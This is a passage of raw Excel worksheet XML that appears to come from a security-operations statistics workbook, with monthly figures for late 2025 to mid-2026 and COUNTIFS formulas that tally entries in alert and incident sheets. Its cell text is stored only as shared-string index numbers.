        <v>2025-11</v>
      </c>
      <c r="G94" s="115" t="str">
        <f t="shared" si="1"/>
        <v>2025-12</v>
      </c>
      <c r="H94" s="115" t="str">
        <f t="shared" si="1"/>
        <v>2026-01</v>
      </c>
      <c r="I94" s="115" t="str">
        <f t="shared" si="1"/>
        <v>2026-02</v>
      </c>
      <c r="J94" s="115" t="str">
        <f t="shared" si="1"/>
        <v>2026-03</v>
      </c>
      <c r="K94" s="115" t="str">
        <f t="shared" si="1"/>
        <v>2026-04</v>
      </c>
      <c r="L94" s="115" t="str">
        <f t="shared" si="1"/>
        <v>2026-05</v>
      </c>
      <c r="M94" s="115" t="str">
        <f t="shared" si="1"/>
        <v>2026-06</v>
      </c>
      <c r="N94" s="115" t="str">
        <f t="shared" si="1"/>
        <v>2026-07</v>
      </c>
    </row>
    <row r="95" spans="2:14">
      <c r="B95" s="168" t="s">
        <v>186</v>
      </c>
      <c r="C95" s="188">
        <v>6729</v>
      </c>
      <c r="D95" s="188">
        <v>5323</v>
      </c>
      <c r="E95" s="188">
        <v>5940</v>
      </c>
      <c r="F95" s="188">
        <v>34095</v>
      </c>
      <c r="G95" s="188">
        <v>6990</v>
      </c>
      <c r="H95" s="188">
        <v>8813</v>
      </c>
      <c r="I95" s="188">
        <v>4270</v>
      </c>
      <c r="J95" s="188">
        <v>4506</v>
      </c>
      <c r="K95" s="188"/>
      <c r="L95" s="188"/>
      <c r="M95" s="188"/>
      <c r="N95" s="188"/>
    </row>
    <row r="96" spans="2:14">
      <c r="B96" s="168" t="s">
        <v>187</v>
      </c>
      <c r="C96" s="188">
        <v>145428</v>
      </c>
      <c r="D96" s="188">
        <v>134496</v>
      </c>
      <c r="E96" s="188">
        <v>165515</v>
      </c>
      <c r="F96" s="188">
        <v>292379</v>
      </c>
      <c r="G96" s="188">
        <v>220881</v>
      </c>
      <c r="H96" s="188">
        <v>176312</v>
      </c>
      <c r="I96" s="188">
        <v>214511</v>
      </c>
      <c r="J96" s="188">
        <v>82013</v>
      </c>
      <c r="K96" s="188"/>
      <c r="L96" s="188"/>
      <c r="M96" s="188"/>
      <c r="N96" s="188"/>
    </row>
    <row r="97" hidden="1" spans="2:14">
      <c r="B97" s="168" t="s">
        <v>188</v>
      </c>
      <c r="C97" s="188">
        <v>303457</v>
      </c>
      <c r="D97" s="188">
        <v>222567</v>
      </c>
      <c r="E97" s="188">
        <v>241853</v>
      </c>
      <c r="F97" s="188">
        <v>195076</v>
      </c>
      <c r="G97" s="188">
        <v>104462</v>
      </c>
      <c r="H97" s="188">
        <v>325269</v>
      </c>
      <c r="I97" s="188">
        <v>228846</v>
      </c>
      <c r="J97" s="188">
        <v>226718</v>
      </c>
      <c r="K97" s="188">
        <v>287975</v>
      </c>
      <c r="L97" s="188">
        <v>165318</v>
      </c>
      <c r="M97" s="188">
        <v>101338</v>
      </c>
      <c r="N97" s="188">
        <v>235646</v>
      </c>
    </row>
    <row r="98" spans="2:14">
      <c r="B98" s="168" t="s">
        <v>189</v>
      </c>
      <c r="C98" s="122">
        <f>COUNTIFS(告警表!$Z:$Z,"&gt;="&amp;DATE(YEAR(C94),MONTH(C94),1),告警表!$Z:$Z,"&lt;="&amp;DATE(YEAR(C94),MONTH(C94),DAY(EOMONTH(C94,0))))</f>
        <v>23</v>
      </c>
      <c r="D98" s="122">
        <f>COUNTIFS(告警表!$Z:$Z,"&gt;="&amp;DATE(YEAR(D94),MONTH(D94),1),告警表!$Z:$Z,"&lt;="&amp;DATE(YEAR(D94),MONTH(D94),DAY(EOMONTH(D94,0))))</f>
        <v>37</v>
      </c>
      <c r="E98" s="122">
        <f>COUNTIFS(告警表!$Z:$Z,"&gt;="&amp;DATE(YEAR(E94),MONTH(E94),1),告警表!$Z:$Z,"&lt;="&amp;DATE(YEAR(E94),MONTH(E94),DAY(EOMONTH(E94,0))))</f>
        <v>115</v>
      </c>
      <c r="F98" s="122">
        <f>COUNTIFS(告警表!$Z:$Z,"&gt;="&amp;DATE(YEAR(F94),MONTH(F94),1),告警表!$Z:$Z,"&lt;="&amp;DATE(YEAR(F94),MONTH(F94),DAY(EOMONTH(F94,0))))</f>
        <v>227</v>
      </c>
      <c r="G98" s="122">
        <f>COUNTIFS(告警表!$Z:$Z,"&gt;="&amp;DATE(YEAR(G94),MONTH(G94),1),告警表!$Z:$Z,"&lt;="&amp;DATE(YEAR(G94),MONTH(G94),DAY(EOMONTH(G94,0))))</f>
        <v>242</v>
      </c>
      <c r="H98" s="122">
        <f>COUNTIFS(告警表!$Z:$Z,"&gt;="&amp;DATE(YEAR(H94),MONTH(H94),1),告警表!$Z:$Z,"&lt;="&amp;DATE(YEAR(H94),MONTH(H94),DAY(EOMONTH(H94,0))))</f>
        <v>117</v>
      </c>
      <c r="I98" s="122">
        <f>COUNTIFS(告警表!$Z:$Z,"&gt;="&amp;DATE(YEAR(I94),MONTH(I94),1),告警表!$Z:$Z,"&lt;="&amp;DATE(YEAR(I94),MONTH(I94),DAY(EOMONTH(I94,0))))</f>
        <v>343</v>
      </c>
      <c r="J98" s="122">
        <f>COUNTIFS(告警表!$Z:$Z,"&gt;="&amp;DATE(YEAR(J94),MONTH(J94),1),告警表!$Z:$Z,"&lt;="&amp;DATE(YEAR(J94),MONTH(J94),DAY(EOMONTH(J94,0))))</f>
        <v>703</v>
      </c>
      <c r="K98" s="122">
        <f>COUNTIFS(告警表!$Z:$Z,"&gt;="&amp;DATE(YEAR(K94),MONTH(K94),1),告警表!$Z:$Z,"&lt;="&amp;DATE(YEAR(K94),MONTH(K94),DAY(EOMONTH(K94,0))))</f>
        <v>0</v>
      </c>
      <c r="L98" s="122">
        <f>COUNTIFS(告警表!$Z:$Z,"&gt;="&amp;DATE(YEAR(L94),MONTH(L94),1),告警表!$Z:$Z,"&lt;="&amp;DATE(YEAR(L94),MONTH(L94),DAY(EOMONTH(L94,0))))</f>
        <v>0</v>
      </c>
      <c r="M98" s="122">
        <f>COUNTIFS(告警表!$Z:$Z,"&gt;="&amp;DATE(YEAR(M94),MONTH(M94),1),告警表!$Z:$Z,"&lt;="&amp;DATE(YEAR(M94),MONTH(M94),DAY(EOMONTH(M94,0))))</f>
        <v>0</v>
      </c>
      <c r="N98" s="122">
        <f>COUNTIFS(告警表!$Z:$Z,"&gt;="&amp;DATE(YEAR(N94),MONTH(N94),1),告警表!$Z:$Z,"&lt;="&amp;DATE(YEAR(N94),MONTH(N94),DAY(EOMONTH(N94,0))))</f>
        <v>0</v>
      </c>
    </row>
    <row r="99" spans="2:14">
      <c r="B99" s="168" t="s">
        <v>190</v>
      </c>
      <c r="C99" s="122">
        <f>COUNTIFS(事件表!A:A,"*事件*",事件表!$B:$B,"&gt;="&amp;DATE(YEAR(C94),MONTH(C94),1),事件表!$B:$B,"&lt;="&amp;DATE(YEAR(C94),MONTH(C94),DAY(EOMONTH(C94,0))))</f>
        <v>9</v>
      </c>
      <c r="D99" s="122">
        <f>COUNTIFS(事件表!A:A,"*事件*",事件表!$B:$B,"&gt;="&amp;DATE(YEAR(D94),MONTH(D94),1),事件表!$B:$B,"&lt;="&amp;DATE(YEAR(D94),MONTH(D94),DAY(EOMONTH(D94,0))))</f>
        <v>5</v>
      </c>
      <c r="E99" s="122">
        <f>COUNTIFS(事件表!A:A,"*事件*",事件表!$B:$B,"&gt;="&amp;DATE(YEAR(E94),MONTH(E94),1),事件表!$B:$B,"&lt;="&amp;DATE(YEAR(E94),MONTH(E94),DAY(EOMONTH(E94,0))))</f>
        <v>1</v>
      </c>
      <c r="F99" s="122">
        <f>COUNTIFS(事件表!A:A,"*事件*",事件表!$B:$B,"&gt;="&amp;DATE(YEAR(F94),MONTH(F94),1),事件表!$B:$B,"&lt;="&amp;DATE(YEAR(F94),MONTH(F94),DAY(EOMONTH(F94,0))))</f>
        <v>2</v>
      </c>
      <c r="G99" s="122">
        <f>COUNTIFS(事件表!A:A,"*事件*",事件表!$B:$B,"&gt;="&amp;DATE(YEAR(G94),MONTH(G94),1),事件表!$B:$B,"&lt;="&amp;DATE(YEAR(G94),MONTH(G94),DAY(EOMONTH(G94,0))))</f>
        <v>4</v>
      </c>
      <c r="H99" s="122">
        <f>COUNTIFS(事件表!A:A,"*事件*",事件表!$B:$B,"&gt;="&amp;DATE(YEAR(H94),MONTH(H94),1),事件表!$B:$B,"&lt;="&amp;DATE(YEAR(H94),MONTH(H94),DAY(EOMONTH(H94,0))))</f>
        <v>2</v>
      </c>
      <c r="I99" s="122">
        <f>COUNTIFS(事件表!A:A,"*事件*",事件表!$B:$B,"&gt;="&amp;DATE(YEAR(I94),MONTH(I94),1),事件表!$B:$B,"&lt;="&amp;DATE(YEAR(I94),MONTH(I94),DAY(EOMONTH(I94,0))))</f>
        <v>2</v>
      </c>
      <c r="J99" s="122">
        <f>COUNTIFS(事件表!A:A,"*事件*",事件表!$B:$B,"&gt;="&amp;DATE(YEAR(J94),MONTH(J94),1),事件表!$B:$B,"&lt;="&amp;DATE(YEAR(J94),MONTH(J94),DAY(EOMONTH(J94,0))))</f>
        <v>1</v>
      </c>
      <c r="K99" s="122">
        <f>COUNTIFS(事件表!A:A,"*事件*",事件表!$B:$B,"&gt;="&amp;DATE(YEAR(K94),MONTH(K94),1),事件表!$B:$B,"&lt;="&amp;DATE(YEAR(K94),MONTH(K94),DAY(EOMONTH(K94,0))))</f>
        <v>0</v>
      </c>
      <c r="L99" s="122">
        <f>COUNTIFS(事件表!A:A,"*事件*",事件表!$B:$B,"&gt;="&amp;DATE(YEAR(L94),MONTH(L94),1),事件表!$B:$B,"&lt;="&amp;DATE(YEAR(L94),MONTH(L94),DAY(EOMONTH(L94,0))))</f>
        <v>0</v>
      </c>
      <c r="M99" s="122">
        <f>COUNTIFS(事件表!A:A,"*事件*",事件表!$B:$B,"&gt;="&amp;DATE(YEAR(M94),MONTH(M94),1),事件表!$B:$B,"&lt;="&amp;DATE(YEAR(M94),MONTH(M94),DAY(EOMONTH(M94,0))))</f>
        <v>0</v>
      </c>
      <c r="N99" s="122">
        <f>COUNTIFS(事件表!A:A,"*事件*",事件表!$B:$B,"&gt;="&amp;DATE(YEAR(N94),MONTH(N94),1),事件表!$B:$B,"&lt;="&amp;DATE(YEAR(N94),MONTH(N94),DAY(EOMONTH(N94,0))))</f>
        <v>0</v>
      </c>
    </row>
    <row r="100" spans="2:14">
      <c r="B100" s="168" t="s">
        <v>191</v>
      </c>
      <c r="C100" s="117">
        <v>40</v>
      </c>
      <c r="D100" s="117">
        <v>70</v>
      </c>
      <c r="E100" s="117">
        <v>35</v>
      </c>
      <c r="F100" s="117">
        <v>10</v>
      </c>
      <c r="G100" s="117">
        <v>2</v>
      </c>
      <c r="H100" s="117">
        <v>1</v>
      </c>
      <c r="I100" s="117">
        <v>0</v>
      </c>
      <c r="J100" s="117">
        <v>1</v>
      </c>
      <c r="K100" s="117"/>
      <c r="L100" s="117"/>
      <c r="M100" s="117"/>
      <c r="N100" s="117"/>
    </row>
    <row r="101" spans="2:14">
      <c r="C101" s="173"/>
    </row>
    <row r="102" spans="2:14">
      <c r="B102" s="151" t="s">
        <v>192</v>
      </c>
      <c r="C102" s="93" t="s">
        <v>193</v>
      </c>
      <c r="D102" s="117">
        <v>4</v>
      </c>
      <c r="E102" s="118" t="s">
        <v>194</v>
      </c>
      <c r="F102" s="93"/>
      <c r="G102" s="93" t="s">
        <v>195</v>
      </c>
      <c r="H102" s="122" t="s">
        <v>196</v>
      </c>
    </row>
    <row r="103" spans="2:14">
      <c r="B103" s="189" t="s">
        <v>197</v>
      </c>
      <c r="C103" s="93" t="s">
        <v>198</v>
      </c>
      <c r="D103" s="117">
        <v>0</v>
      </c>
      <c r="E103" s="119"/>
      <c r="F103" s="190" t="s">
        <v>199</v>
      </c>
      <c r="G103" s="117">
        <v>9623</v>
      </c>
      <c r="H103" s="191">
        <v>1</v>
      </c>
    </row>
    <row r="104" spans="2:14">
      <c r="B104" s="192"/>
      <c r="C104" s="93" t="s">
        <v>200</v>
      </c>
      <c r="D104" s="191">
        <v>1</v>
      </c>
      <c r="E104" s="119"/>
      <c r="F104" s="190" t="s">
        <v>201</v>
      </c>
      <c r="G104" s="117">
        <v>28655</v>
      </c>
      <c r="H104" s="191">
        <v>1</v>
      </c>
    </row>
    <row r="105" spans="2:14">
      <c r="B105" s="154"/>
      <c r="C105" s="155"/>
      <c r="D105" s="193"/>
      <c r="E105" s="119"/>
      <c r="F105" s="190" t="s">
        <v>202</v>
      </c>
      <c r="G105" s="117">
        <v>3461</v>
      </c>
      <c r="H105" s="191">
        <v>1</v>
      </c>
    </row>
    <row r="106" spans="2:14">
      <c r="B106" s="154"/>
      <c r="C106" s="155"/>
      <c r="D106" s="193"/>
      <c r="E106" s="119"/>
      <c r="F106" s="190" t="s">
        <v>203</v>
      </c>
      <c r="G106" s="117">
        <v>16440</v>
      </c>
      <c r="H106" s="191">
        <v>1</v>
      </c>
    </row>
    <row r="107" spans="2:14">
      <c r="B107" s="154"/>
      <c r="C107" s="155"/>
      <c r="D107" s="193"/>
      <c r="E107" s="119"/>
      <c r="F107" s="190"/>
      <c r="G107" s="117"/>
      <c r="H107" s="191"/>
    </row>
    <row r="108" spans="2:14">
      <c r="B108" s="154"/>
      <c r="C108" s="155"/>
      <c r="D108" s="155"/>
      <c r="E108" s="119"/>
      <c r="F108" s="190"/>
      <c r="G108" s="117"/>
      <c r="H108" s="191"/>
    </row>
    <row r="109" spans="2:14">
      <c r="B109" s="159"/>
      <c r="C109" s="194"/>
      <c r="D109" s="132"/>
      <c r="E109" s="121"/>
      <c r="F109" s="190"/>
      <c r="G109" s="117"/>
      <c r="H109" s="191"/>
    </row>
    <row r="111" spans="2:14">
      <c r="B111" s="93" t="s">
        <v>204</v>
      </c>
      <c r="C111" s="93" t="s">
        <v>205</v>
      </c>
      <c r="D111" s="117">
        <v>42572</v>
      </c>
      <c r="E111" s="135"/>
      <c r="F111" s="136"/>
    </row>
    <row r="112" spans="2:14">
      <c r="B112" s="122" t="s">
        <v>206</v>
      </c>
      <c r="C112" s="93" t="s">
        <v>207</v>
      </c>
      <c r="D112" s="161">
        <f>D35/D111</f>
        <v>0.573170158789815</v>
      </c>
      <c r="F112" s="124"/>
    </row>
    <row r="113" spans="2:6">
      <c r="B113" s="122"/>
      <c r="C113" s="93" t="s">
        <v>208</v>
      </c>
      <c r="D113" s="191">
        <v>1</v>
      </c>
      <c r="F113" s="124"/>
    </row>
    <row r="114" spans="2:6">
      <c r="B114" s="122" t="s">
        <v>209</v>
      </c>
      <c r="C114" s="93" t="s">
        <v>210</v>
      </c>
      <c r="D114" s="117">
        <v>393</v>
      </c>
      <c r="E114" s="93" t="s">
        <v>211</v>
      </c>
      <c r="F114" s="117">
        <v>39</v>
      </c>
    </row>
    <row r="115" spans="2:6">
      <c r="B115" s="122"/>
      <c r="C115" s="93" t="s">
        <v>212</v>
      </c>
      <c r="D115" s="117">
        <v>254</v>
      </c>
      <c r="E115" s="93" t="s">
        <v>213</v>
      </c>
      <c r="F115" s="123">
        <f>D5</f>
        <v>104</v>
      </c>
    </row>
    <row r="116" spans="2:6">
      <c r="B116" s="122"/>
      <c r="C116" s="93" t="s">
        <v>214</v>
      </c>
      <c r="D116" s="161">
        <f>D5/D64</f>
        <v>0.65</v>
      </c>
      <c r="E116" s="93" t="s">
        <v>215</v>
      </c>
      <c r="F116" s="123">
        <f>D64</f>
        <v>160</v>
      </c>
    </row>
    <row r="117" spans="2:6">
      <c r="B117" s="114" t="s">
        <v>216</v>
      </c>
      <c r="C117" s="93" t="s">
        <v>217</v>
      </c>
      <c r="D117" s="195">
        <f>G35</f>
        <v>4356578</v>
      </c>
      <c r="E117" s="93" t="s">
        <v>218</v>
      </c>
      <c r="F117" s="195">
        <f>D117/DATEDIF(L1,M1,"M")</f>
        <v>622368.285714286</v>
      </c>
    </row>
    <row r="118" spans="2:6">
      <c r="B118" s="114"/>
      <c r="C118" s="93" t="s">
        <v>219</v>
      </c>
      <c r="D118" s="195">
        <f>G36</f>
        <v>92339</v>
      </c>
      <c r="E118" s="93" t="s">
        <v>220</v>
      </c>
      <c r="F118" s="195">
        <f>D118/DATEDIF(L1,M1,"M")</f>
        <v>13191.2857142857</v>
      </c>
    </row>
    <row r="119" spans="2:6">
      <c r="B119" s="114"/>
      <c r="C119" s="93" t="s">
        <v>221</v>
      </c>
      <c r="D119" s="123">
        <f>G37</f>
        <v>13489</v>
      </c>
      <c r="E119" s="93" t="s">
        <v>222</v>
      </c>
      <c r="F119" s="196">
        <f>D119/DATEDIF(L1,M1,"M")</f>
        <v>1927</v>
      </c>
    </row>
    <row r="120" spans="2:6">
      <c r="B120" s="154"/>
      <c r="F120" s="124"/>
    </row>
    <row r="121" spans="2:6">
      <c r="B121" s="118" t="s">
        <v>223</v>
      </c>
      <c r="C121" s="93" t="s">
        <v>224</v>
      </c>
      <c r="D121" s="122">
        <f>COUNTIFS(事件表!C:C,"*离线*",事件表!B:B,"&gt;="&amp;L1,事件表!B:B,"&lt;="&amp;M1)</f>
        <v>54</v>
      </c>
      <c r="F121" s="124"/>
    </row>
    <row r="122" spans="2:6">
      <c r="B122" s="119"/>
      <c r="C122" s="93" t="s">
        <v>225</v>
      </c>
      <c r="D122" s="122">
        <f>COUNTIFS(事件表!C:C,"*日志检测*",事件表!AW:AW,"已通告",事件表!B:B,"&gt;="&amp;L1,事件表!B:B,"&lt;="&amp;M1)</f>
        <v>0</v>
      </c>
      <c r="F122" s="124"/>
    </row>
    <row r="123" spans="2:6">
      <c r="B123" s="119"/>
      <c r="C123" s="93" t="s">
        <v>226</v>
      </c>
      <c r="D123" s="122">
        <f>COUNTIFS(事件表!C:C,"*策略*",事件表!AW:AW,"已通告",事件表!B:B,"&gt;="&amp;L1,事件表!B:B,"&lt;="&amp;M1)</f>
        <v>0</v>
      </c>
      <c r="F123" s="124"/>
    </row>
    <row r="124" spans="2:6">
      <c r="B124" s="121"/>
      <c r="C124" s="93" t="s">
        <v>227</v>
      </c>
      <c r="D124" s="161">
        <f>COUNTIFS(事件表!A:A,"*事件*",事件表!BB:BB,"",事件表!B:B,"&gt;="&amp;L1,事件表!B:B,"&lt;="&amp;M1)/COUNTIFS(事件表!A:A,"*事件*",事件表!B:B,"&gt;="&amp;L1,事件表!B:B,"&lt;="&amp;M1)</f>
        <v>0.538461538461538</v>
      </c>
      <c r="E124" s="132"/>
      <c r="F124" s="133"/>
    </row>
  </sheetData>
  <mergeCells count="33">
    <mergeCell ref="B1:F1"/>
    <mergeCell ref="B93:N93"/>
    <mergeCell ref="B4:B7"/>
    <mergeCell ref="B8:B9"/>
    <mergeCell ref="B10:B18"/>
    <mergeCell ref="B20:B21"/>
    <mergeCell ref="B22:B26"/>
    <mergeCell ref="B28:B30"/>
    <mergeCell ref="B33:B34"/>
    <mergeCell ref="B35:B38"/>
    <mergeCell ref="B39:B44"/>
    <mergeCell ref="B45:B48"/>
    <mergeCell ref="B50:B51"/>
    <mergeCell ref="B53:B57"/>
    <mergeCell ref="B65:B68"/>
    <mergeCell ref="B76:B78"/>
    <mergeCell ref="B79:B82"/>
    <mergeCell ref="B85:B87"/>
    <mergeCell ref="B88:B89"/>
    <mergeCell ref="B90:B91"/>
    <mergeCell ref="B103:B104"/>
    <mergeCell ref="B112:B113"/>
    <mergeCell ref="B114:B116"/>
    <mergeCell ref="B117:B119"/>
    <mergeCell ref="B121:B124"/>
    <mergeCell ref="E23:E27"/>
    <mergeCell ref="E35:E39"/>
    <mergeCell ref="E40:E43"/>
    <mergeCell ref="E53:E57"/>
    <mergeCell ref="E64:E68"/>
    <mergeCell ref="E102:E109"/>
    <mergeCell ref="H23:H26"/>
    <mergeCell ref="H27:H3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N29"/>
  <sheetViews>
    <sheetView showGridLines="0" zoomScale="95" zoomScaleNormal="95" workbookViewId="0">
      <selection activeCell="J27" sqref="J27"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.89814814814815" defaultRowHeight="14.4"/>
  <cols>
    <col min="1" max="1" width="2.66666666666667" customWidth="1"/>
    <col min="2" max="2" width="15.6666666666667" customWidth="1"/>
    <col min="3" max="3" width="24.3055555555556" customWidth="1"/>
    <col min="4" max="4" width="39.1018518518519" customWidth="1"/>
    <col min="5" max="5" width="32.2222222222222" customWidth="1"/>
    <col min="6" max="6" width="17" customWidth="1"/>
    <col min="7" max="7" width="13.1018518518519" customWidth="1"/>
    <col min="9" max="9" width="17.8888888888889" customWidth="1"/>
    <col min="10" max="10" width="48.3333333333333" customWidth="1"/>
    <col min="11" max="11" width="48.0648148148148" customWidth="1"/>
    <col min="12" max="12" width="76.3888888888889" customWidth="1"/>
    <col min="13" max="13" width="44.0648148148148" customWidth="1"/>
    <col min="14" max="14" width="37.3981481481481" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" ht="7.05" customHeight="1"/>
    <row r="2" ht="25.05" customHeight="1" spans="2:7">
      <c r="B2" s="48" t="s">
        <v>228</v>
      </c>
      <c r="C2" s="49"/>
      <c r="D2" s="49"/>
      <c r="E2" s="49"/>
      <c r="F2" s="49"/>
      <c r="G2" s="50"/>
    </row>
    <row r="3" ht="25.05" customHeight="1" spans="2:7">
      <c r="B3" s="51" t="s">
        <v>229</v>
      </c>
      <c r="C3" s="52" t="s">
        <v>230</v>
      </c>
      <c r="D3" s="52" t="s">
        <v>231</v>
      </c>
      <c r="E3" s="52" t="s">
        <v>232</v>
      </c>
      <c r="F3" s="52" t="s">
        <v>233</v>
      </c>
      <c r="G3" s="53"/>
    </row>
    <row r="4" ht="28.8" spans="2:7">
      <c r="B4" s="54" t="s">
        <v>234</v>
      </c>
      <c r="C4" s="52" t="s">
        <v>235</v>
      </c>
      <c r="D4" s="55" t="s">
        <v>236</v>
      </c>
      <c r="E4" s="55" t="s">
        <v>237</v>
      </c>
      <c r="F4" s="52" t="s">
        <v>238</v>
      </c>
      <c r="G4" s="53"/>
    </row>
    <row r="5" ht="28.8" spans="2:7">
      <c r="B5" s="56"/>
      <c r="C5" s="52" t="s">
        <v>239</v>
      </c>
      <c r="D5" s="55" t="s">
        <v>240</v>
      </c>
      <c r="E5" s="55" t="s">
        <v>241</v>
      </c>
      <c r="F5" s="52" t="s">
        <v>242</v>
      </c>
      <c r="G5" s="53"/>
    </row>
    <row r="6" ht="49.95" customHeight="1" spans="2:7">
      <c r="B6" s="57"/>
      <c r="C6" t="s">
        <v>243</v>
      </c>
      <c r="D6" s="58" t="s">
        <v>244</v>
      </c>
      <c r="E6" s="58" t="s">
        <v>245</v>
      </c>
      <c r="F6" s="52" t="s">
        <v>246</v>
      </c>
      <c r="G6" s="53"/>
    </row>
    <row r="7" ht="66" customHeight="1" spans="2:7">
      <c r="B7" s="54" t="s">
        <v>247</v>
      </c>
      <c r="C7" s="59" t="s">
        <v>248</v>
      </c>
      <c r="D7" s="55" t="s">
        <v>249</v>
      </c>
      <c r="E7" s="55" t="s">
        <v>250</v>
      </c>
      <c r="F7" s="52" t="s">
        <v>238</v>
      </c>
      <c r="G7" s="53"/>
    </row>
    <row r="8" ht="54" customHeight="1" spans="2:7">
      <c r="B8" s="56"/>
      <c r="C8" s="60"/>
      <c r="D8" s="61" t="s">
        <v>251</v>
      </c>
      <c r="E8" s="55" t="s">
        <v>252</v>
      </c>
      <c r="F8" s="52" t="s">
        <v>238</v>
      </c>
      <c r="G8" s="53"/>
    </row>
    <row r="9" ht="63" customHeight="1" spans="2:7">
      <c r="B9" s="56"/>
      <c r="C9" s="59" t="s">
        <v>253</v>
      </c>
      <c r="D9" s="55" t="s">
        <v>254</v>
      </c>
      <c r="E9" s="55" t="s">
        <v>250</v>
      </c>
      <c r="F9" s="52" t="s">
        <v>238</v>
      </c>
      <c r="G9" s="53"/>
    </row>
    <row r="10" ht="66" customHeight="1" spans="2:7">
      <c r="B10" s="57"/>
      <c r="C10" s="60"/>
      <c r="D10" s="55" t="s">
        <v>251</v>
      </c>
      <c r="E10" s="55" t="s">
        <v>252</v>
      </c>
      <c r="F10" s="52" t="s">
        <v>238</v>
      </c>
      <c r="G10" s="53"/>
    </row>
    <row r="11" ht="45" customHeight="1" spans="2:7">
      <c r="B11" s="54" t="s">
        <v>255</v>
      </c>
      <c r="C11" s="52" t="s">
        <v>256</v>
      </c>
      <c r="D11" s="55" t="s">
        <v>257</v>
      </c>
      <c r="E11" s="55" t="s">
        <v>258</v>
      </c>
      <c r="F11" s="52" t="s">
        <v>246</v>
      </c>
      <c r="G11" s="53"/>
    </row>
    <row r="12" ht="75" customHeight="1" spans="2:7">
      <c r="B12" s="56"/>
      <c r="C12" s="52" t="s">
        <v>259</v>
      </c>
      <c r="D12" s="55" t="s">
        <v>260</v>
      </c>
      <c r="E12" s="55" t="s">
        <v>258</v>
      </c>
      <c r="F12" s="52" t="s">
        <v>246</v>
      </c>
      <c r="G12" s="53"/>
    </row>
    <row r="13" ht="87" customHeight="1" spans="2:7">
      <c r="B13" s="56"/>
      <c r="C13" s="62" t="s">
        <v>261</v>
      </c>
      <c r="D13" s="62" t="s">
        <v>262</v>
      </c>
      <c r="E13" s="62" t="s">
        <v>258</v>
      </c>
      <c r="F13" s="63" t="s">
        <v>263</v>
      </c>
      <c r="G13" s="64"/>
    </row>
    <row r="14" ht="25.05" customHeight="1" spans="2:7">
      <c r="B14" s="48" t="s">
        <v>264</v>
      </c>
      <c r="C14" s="49"/>
      <c r="D14" s="49"/>
      <c r="E14" s="49"/>
      <c r="F14" s="49"/>
      <c r="G14" s="50"/>
    </row>
    <row r="15" ht="73.95" customHeight="1" spans="2:7">
      <c r="B15" s="51"/>
      <c r="C15" s="52" t="s">
        <v>265</v>
      </c>
      <c r="D15" s="55" t="s">
        <v>266</v>
      </c>
      <c r="E15" s="55" t="s">
        <v>267</v>
      </c>
      <c r="F15" s="52" t="s">
        <v>268</v>
      </c>
      <c r="G15" s="53"/>
    </row>
    <row r="16" ht="57.6" spans="2:7">
      <c r="B16" s="65"/>
      <c r="C16" s="63" t="s">
        <v>269</v>
      </c>
      <c r="D16" s="62" t="s">
        <v>270</v>
      </c>
      <c r="E16" s="62" t="s">
        <v>267</v>
      </c>
      <c r="F16" s="63" t="s">
        <v>268</v>
      </c>
      <c r="G16" s="64"/>
    </row>
    <row r="17" ht="58.05" customHeight="1" spans="2:14">
      <c r="B17" s="66"/>
      <c r="C17" s="67" t="s">
        <v>271</v>
      </c>
      <c r="D17" s="68" t="s">
        <v>272</v>
      </c>
      <c r="E17" s="68" t="s">
        <v>273</v>
      </c>
      <c r="F17" s="67" t="s">
        <v>274</v>
      </c>
      <c r="G17" s="69"/>
    </row>
    <row r="18" ht="25.05" customHeight="1"/>
    <row r="19" ht="34.05" customHeight="1" spans="2:14">
      <c r="B19" s="70" t="s">
        <v>275</v>
      </c>
      <c r="C19" s="71"/>
      <c r="D19" s="71"/>
      <c r="E19" s="71"/>
      <c r="F19" s="71"/>
      <c r="G19" s="71"/>
      <c r="H19" s="71"/>
    </row>
    <row r="20" ht="82.95" customHeight="1" spans="2:14">
      <c r="B20" s="72" t="s">
        <v>276</v>
      </c>
      <c r="C20" s="73"/>
      <c r="D20" s="73"/>
      <c r="E20" s="73"/>
      <c r="F20" s="73"/>
      <c r="G20" s="73"/>
      <c r="H20" s="73"/>
      <c r="J20" s="72" t="s">
        <v>277</v>
      </c>
      <c r="K20" s="73"/>
      <c r="L20" s="73"/>
      <c r="M20" s="73"/>
      <c r="N20" s="73"/>
    </row>
    <row r="21" ht="25.95" customHeight="1" spans="2:14">
      <c r="B21" s="74" t="s">
        <v>278</v>
      </c>
      <c r="C21" s="75" t="s">
        <v>279</v>
      </c>
      <c r="D21" s="76" t="s">
        <v>280</v>
      </c>
      <c r="E21" s="77" t="s">
        <v>281</v>
      </c>
      <c r="F21" s="78"/>
      <c r="G21" s="79"/>
      <c r="H21" s="80"/>
      <c r="J21" s="81" t="s">
        <v>282</v>
      </c>
      <c r="K21" s="82" t="s">
        <v>283</v>
      </c>
      <c r="L21" s="82" t="s">
        <v>284</v>
      </c>
      <c r="M21" s="82" t="s">
        <v>285</v>
      </c>
      <c r="N21" s="82" t="s">
        <v>286</v>
      </c>
    </row>
    <row r="22" ht="102" customHeight="1" spans="2:14">
      <c r="B22" s="83" t="s">
        <v>287</v>
      </c>
      <c r="C22" s="84" t="s">
        <v>288</v>
      </c>
      <c r="D22" s="85" t="s">
        <v>289</v>
      </c>
      <c r="E22" s="86" t="s">
        <v>290</v>
      </c>
      <c r="F22" s="87"/>
      <c r="G22" s="88"/>
      <c r="H22" s="53"/>
      <c r="J22" s="89" t="s">
        <v>291</v>
      </c>
      <c r="K22" s="90" t="s">
        <v>292</v>
      </c>
      <c r="L22" s="91" t="s">
        <v>293</v>
      </c>
      <c r="M22" s="92" t="s">
        <v>294</v>
      </c>
      <c r="N22" s="93" t="s">
        <v>295</v>
      </c>
    </row>
    <row r="23" ht="101" customHeight="1" spans="2:14">
      <c r="B23" s="83"/>
      <c r="C23" s="84" t="s">
        <v>296</v>
      </c>
      <c r="D23" s="85" t="s">
        <v>265</v>
      </c>
      <c r="E23" s="94" t="s">
        <v>297</v>
      </c>
      <c r="F23" s="95"/>
      <c r="G23" s="96"/>
      <c r="H23" s="53"/>
      <c r="J23" s="97" t="s">
        <v>298</v>
      </c>
      <c r="K23" s="90" t="s">
        <v>299</v>
      </c>
      <c r="L23" s="92" t="s">
        <v>300</v>
      </c>
      <c r="M23" s="92" t="s">
        <v>301</v>
      </c>
      <c r="N23" s="93" t="s">
        <v>295</v>
      </c>
    </row>
    <row r="24" ht="105" customHeight="1" spans="2:14">
      <c r="B24" s="83" t="s">
        <v>302</v>
      </c>
      <c r="C24" s="98" t="s">
        <v>303</v>
      </c>
